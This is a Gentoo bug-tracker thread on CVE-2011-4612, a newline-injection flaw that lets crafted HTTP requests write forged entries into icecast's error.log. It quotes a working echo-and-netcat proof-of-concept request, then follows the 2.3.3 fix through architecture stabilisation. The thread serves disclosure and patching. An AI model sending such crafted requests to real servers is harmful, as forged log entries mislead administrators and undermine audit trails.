Jamie Strandboge <jamie@canonical.com> reported to icecast developers (CCing <oss-security@lists.openwall.com>) about possibility to inject fake message into icecast error log by specially crafted HTTP request sent to icecast server port discovered by Moritz Naumann: "Newline injection in error.log Running this command against an icecast2 running on 127.0.0.1... echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d% 0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d% 0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN% 20fserve/fserve_client_create%20req%20for%20file% 20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null ...causes the following to be written to /var/log/icecast2/error.log: [2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory [1970-01-01 00:00:00] PHUN I'm feeling phunny ..." Source: http://thread.gmane.org/gmane.comp.audio.icecast.devel/1815 Upstream responded fixing 2.3.3 version would be released soon.
Thanks for the bug, Petr.
I was able to reproduce the fake log file with the same info as referenced here: https://bugs.launchpad.net/ubuntu/+source/icecast2/+bug/894782 netcat must be installed of course
Any news? Because 2.3.3 is released.
The 2.3.3 fixes this issue: r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Čt, 07 čen 2012) | 3 lines This is part of the patch-set addressing CVE-2011-4612.
2.3.3 now in portage. I can only do a limited testing on my webserver so please give it a try (or please ATs, test as much as you can) before marking it stable.
(In reply to comment #5) > 2.3.3 now in portage. I can only do a limited testing on my webserver so > please give it a try (or please ATs, test as much as you can) before marking > it stable. Thanks, Markos. Arches, please test and mark stable: =net-misc/icecast-2.3.3 Target KEYWORDS: "alpha amd64 ppc ppc64 sparc x86"
I stumbled upon bug 430434.
x86 done, thanks!
ppc done
amd64 done
alpha/sparc keywords dropped
+ 18 Sep 2012; Kacper Kowalik <xarthisius@gentoo.org> icecast-2.3.3.ebuild: + ppc64 stable wrt #394847, add missing inherit of user.eclass and explicit + RDEPEND ppc64 stable, last arch done
Thanks, everyone. GLSA vote: no.
Thanks, folks. GLSA Vote: No, tool, closing.
CVE-2011-4612 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4612): icecast before 2.3.3 allows remote attackers to inject control characters such as newlines into the error loc (error.log) via a crafted URL.